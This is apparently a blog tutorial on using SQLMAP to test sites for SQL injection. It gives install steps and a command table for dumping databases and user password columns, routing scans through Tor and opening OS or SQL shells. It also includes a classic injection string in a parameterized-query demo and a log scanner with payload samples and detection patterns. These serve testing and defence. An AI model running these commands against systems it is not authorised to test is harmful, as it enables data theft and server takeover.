Monday, March 1, 14:14

SQLMAP: How to test your site for SQL vulnerabilities

In the field of ethical hacking, SQLMAP is the predominant tool for finding vulnerabilities based on SQL injection. It is an open source tool written in Python that automates the process of finding and exploiting SQL vulnerabilities, with the ultimate goal of fully controlling the database and the server on which it resides.


It includes several functions, such as database fingerprinting, data collection and command execution on the operating system. The SQLMAP tool can be used for the following purposes:

  • Checking a web application for a SQL injection vulnerability
  • Exploiting a SQL injection vulnerability
  • Extracting data from the database and its users
  • Bypassing the Web Application Firewall (WAF)
  • Taking full control of the underlying operating system

Some of the most important features of SQLMAP are shown below:

  • It supports MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase.
  • It also supports 6 different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • It supports recovering hashed passwords using a dictionary attack.
  • It allows enumeration of users, hashed passwords, roles, permissions, databases, tables and columns.

What is SQL injection?

SQL injection is a hacking technique in which the attacker, by modifying the URL or some other input field of the web application, can insert SQL commands that are passed directly to the database. This bypasses the application's security controls, and as a result the attacker can extract data from the entire database, modify it and even delete it.

It is one of the oldest and most dangerous attacks on web applications. OWASP (Open Web Application Security Project) ranks injection threats at number one on the list of Top 10 Web Application Security Threats (OWASP Top 10).
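The mechanism described above, next to its fix, as an added example that is not part of the original article. The table, the credentials and the function names are constructed for illustration; passwords are stored in plaintext only to keep the example short.

```python
import sqlite3

def make_db():
    """In-memory database with a constructed users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "wonderland")])
    return db

def login_vulnerable(db, username, password):
    """Builds the SQL text from the input, so the input can change the query."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return sorted(row[0] for row in db.execute(query))

def login_parameterized(db, username, password):
    """Binds the input as data, so it can never become SQL syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in db.execute(query, (username, password)))

# Constructed form-field value that closes the string literal and appends
# a condition that is always true.
CRAFTED = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    # Vulnerable version: the WHERE clause becomes
    #   username = 'admin' AND password = '' OR '1'='1'
    # which is true for every row, so all users match.
    print("vulnerable:   ", login_vulnerable(db, "admin", CRAFTED))
    # Parameterized version: the same value is compared as a literal password.
    print("parameterized:", login_parameterized(db, "admin", CRAFTED))
```

A site whose queries are all built like `login_parameterized` gives an injection scanner nothing to find in that code path.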

How to use it

SQLMAP is available for Windows, Linux and Mac. You will find it pre-installed on Kali Linux, the Linux distro for penetration testing.

Windows 

The first step is to download the Python interpreter, if you don't already have it (remember that the tool is written in Python). You can download the latest version from here (v 3.8.0).

After you have successfully completed the python installation, follow these steps:

  1. Download the zip file from the SQLMAP website.
  2. Unzip the folder and its contents to the desired location.
  3. Open a cmd console and navigate to the location where you unzipped the folder in the previous step.
  4. Run the sqlmap.py command and see all your options.
  5. You are ready.


Linux

In almost all Linux distros Python is installed by default. If you're not sure, open a terminal and type python --version. If Python is installed, the command will show you the version.


Then run the following commands to complete the installation of the tool:

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py

The last command will display on our screen something like the following:

[Screenshot: sqlmap]

How to use it

Here are some basic commands you can use with SQLMAP and their description:

| Command | Description |
|---|---|
| sqlmap -u "http://site.com/login.php" | Simple check for a specific URL |
| sqlmap -u "http://site.com/login.php" --tor --tor-type=SOCKS5 | Check using Tor |
| sqlmap -u "http://site.com/login.php" --time-sec 20 | Check with the time limit set |
| sqlmap -u "http://site.com/login.php" --dbs | Return all databases of a web application |
| sqlmap -u "http://site.com/login.php" -D site_db --tables | Return the contents of a specific database |
| sqlmap -u "http://site.com/login.php" -D site_db -T users --dump | Return the contents of a particular table |
| sqlmap -u "http://site.com/login.php" -D site_db -T users --columns | Return all columns in a table |
| sqlmap -u "http://site.com/login.php" -D site_db -T users -C username,password --dump | Return the content of specific columns |
| sqlmap -u "http://site.com/login.php" --method "POST" --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump | Return a table when we have the admin login information |
| sqlmap --dbms=mysql -u "http://site.com/login.php" --os-shell | Return an OS shell |
| sqlmap --dbms=mysql -u "http://site.com/login.php" --sql-shell | Return an SQL shell |

You can find a more detailed cheat sheet for SQLMAP here.
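When you test your own site with the commands above, the requests are visible in the web server's access log. The following added example (not part of the original article) flags such requests by the tool's default User-Agent and by patterns matching four of the injection techniques listed earlier; the log lines, IP addresses and version string are constructed, and the signatures are heuristics, not a complete rule set.

```python
import re
from urllib.parse import unquote_plus

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# name -> (field to inspect, pattern). Names follow the article's technique list.
SIGNATURES = {
    "default sqlmap User-Agent": ("ua", re.compile(r"sqlmap", re.I)),
    "UNION query": ("path", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    "time-based blind": ("path", re.compile(
        r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I)),
    "boolean-based blind": ("path", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    "stacked queries": ("path", re.compile(
        r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I)),
}

def classify(line):
    """Return (source_ip, [matched signature names]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %XX and '+' so encoded keywords are matched as well.
    fields = {"ua": m.group("ua"), "path": unquote_plus(m.group("path"))}
    hits = [name for name, (field, rx) in SIGNATURES.items()
            if rx.search(fields[field])]
    return m.group("ip"), hits

def suspicious_sources(lines):
    """Map each source IP to the sorted signature names it triggered."""
    found = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            found.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(names) for ip, names in found.items()}

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2021:14:00:01 +0000] "GET /login.php?id=1 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Mar/2021:14:00:05 +0000] "GET /login.php?id=1%20AND%205121%3D5121 '
    'HTTP/1.1" 200 512 "-" "sqlmap/1.5#stable (http://sqlmap.org)"',
    '198.51.100.7 - - [01/Mar/2021:14:00:06 +0000] "GET /login.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL '
    'HTTP/1.1" 200 530 "-" "sqlmap/1.5#stable (http://sqlmap.org)"',
    '203.0.113.9 - - [01/Mar/2021:14:02:11 +0000] "GET /login.php?id=1%20AND%20SLEEP(5) '
    'HTTP/1.1" 200 498 "-" "curl/7.68.0"',
]
```

The User-Agent is chosen by the client, so the payload patterns matter more than the first signature; POST bodies do not appear in a standard access log and need application or WAF logging to be inspected.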

We look forward to your comments ...
